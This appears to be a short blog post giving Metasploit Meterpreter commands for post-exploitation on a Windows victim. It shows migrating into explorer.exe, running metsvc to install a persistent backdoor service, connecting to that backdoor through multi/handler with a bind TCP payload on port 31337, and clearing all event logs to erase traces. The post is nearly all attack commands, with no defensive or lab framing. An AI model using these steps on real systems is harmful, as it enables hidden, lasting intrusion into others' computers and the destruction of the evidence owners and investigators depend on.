Install a persistent backdoor:
meterpreter>ps
When locating the explorer.exe (suppose the process ID of the explorer.exe is 623), execute the command below:
meterpreter>migrate 623
meterpreter>run metsvc
Connect to the metsvc (suppose the victim owns the IP address, 192.168.1.104):
msf>use exploit/multi/handler
msf exploit(handler)>set PAYLOAD windows/metsvc_bind_tcp
msf exploit(handler)>set LPORT 31337
msf exploit(handler)>set RHOST 192.168.1.104
msf exploit(handler)>show options
msf exploit(handler)>run
Clean all Event Log:
meterpreter>clearev
No comments:
Post a Comment